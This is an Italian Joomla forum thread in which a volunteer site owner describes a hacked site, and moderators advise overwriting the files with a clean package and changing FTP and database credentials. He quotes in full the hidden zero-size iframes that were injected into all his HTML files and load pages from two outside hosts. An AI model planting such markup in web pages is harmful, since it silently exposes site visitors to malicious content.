Back to top

Autore Topic: grosso problema col pannello amministratore  (Letto 1288 volte)

Offline saltino87

• Nuovo arrivato
  • *
    • Mostra profilo
grosso problema col pannello amministratore
« il: 17 Dic 2008, 19:12:05 »
ciao a tutti..
volevo chiedervi se potevate aiutarmi col mio problema..
quando aprivo il mio sito fatto in joomla(http://pionieri.criprignano.it)
avast mi segnalava un malware(HTML:Iframe-gen)..ho scoperto che era dovuto ad un iframe che era presente alla fine di tutti i file html sul server 

(<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>)   

così ho cancellato queste righe da tutti i file e adesso  quando accedo al pannello amministratore mi viene la prima schermata ma quando provo a selezionare le varie voci del menu in alto(sito,menu,contenuti ecc) mi appare solo una schermata con la scritta "You first web sites for 100 $ grant send after communication for hecked55@hotmail.com msn to add Joomla Admin" e nient altro..
come posso risolvere GRAZIE MILLE
« Ultima modifica: 18 Dic 2008, 12:07:36 da saltino87 »

Offline saltino87

• Nuovo arrivato
  • *
    • Mostra profilo
Re: grosso problema col pannello amministratore
« Risposta #1 il: 03 Gen 2009, 14:07:28 »
ma proprio nessuno sa come aiutarmi?? :'(

Offline 56francesco

• Fuori controllo
  • *
    • Mostra profilo
« Risposta #2 il: 03 Gen 2009, 14:11:41 »
non puoi spianare  e ricaricare tutto?
nel frattempo hai cambiato le credenziali di accesso, tutte però ftp e datbase comprese?

(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline saltino87

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #3 il: 06 Gen 2009, 15:25:28 »
non puoi spianare  e ricaricare tutto?
nel frattempo hai cambiato le credenziali di accesso, tutte però ftp e datbase comprese?

è che non volevo perdere tutti gli articoli che avevo sul sito..
che da quel che ho capito il gestore del server non ha mai fatto  un backup del database..
cmq io nn ho cambiato nessuna credenziale..
cosa potrei fare??

intanto grazie per avermi risposto..

Offline sali40

• Global Moderator
  • Instancabile
    • Mostra profilo
« Risposta #4 il: 06 Gen 2009, 15:44:10 »
Allora:
1) se "spiani" lo spazio web e ricarichi tutti i file e le cartelle, non perdi affatto i contenuti (che stanno nel database);
2) per modificare le credenziali, è conveniente chiedere al tuo host;

3)
che da quel che ho capito il gestore del server non ha mai fatto  un backup del database..
... OMMAMMA!!! ma perché non cambi gestore del server?

Offline saltino87

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #5 il: 07 Gen 2009, 14:18:50 »
1) se "spiani" lo spazio web e ricarichi tutti i file e le cartelle, non perdi affatto i contenuti (che stanno nel database);
2) per modificare le credenziali, è conveniente chiedere al tuo host;
... OMMAMMA!!! ma perché non cambi gestore del server?

cioè dovrei reinstallare joomla sul server??ma non va a intaccare anche il database??
perche dovrei modificare le mie credenziali??

P.S. il mio è il sito di un gruppo di volontari CRI e il server ce lo ha offerto e ce lo gestisce un altro volontario che ha un azienda di informatica, perciò non posso cambiare gestore.. :P

cmq grazie per l'impegno che mi state dedicando..dato che sono palesemente poco esperto..

Offline sali40

• Global Moderator
  • Instancabile
    • Mostra profilo
« Risposta #6 il: 07 Gen 2009, 14:30:00 »
non "reinstallare" ma "sovrascrivere".

Se prendi un pacchetto pulito, e lo carichi sul server, questo va a sovrascriver i file di joomla mettendo, quindi, i file "puliti".

Questa operazione non tocca affatto il database (che non essendo un file, non viene sovrascritto).

Cambiare le credenziali perché, se qualcuno è riuscito a crakkare il tuo sito, è possibile che sia entrato come utente ftp, ad esempli.
Cambiare le crednziali di accesso ftp, in questo caso, è una norma di buon senso che va consigliata.

Inoltre considerato che nel configuration.php i dati di accesso al database sono visibili, modificare i dati di accesso al database e impostare i nuovi dati nel configuration.php è anch'esso consigliabile

Web Design Bolzano Kreatif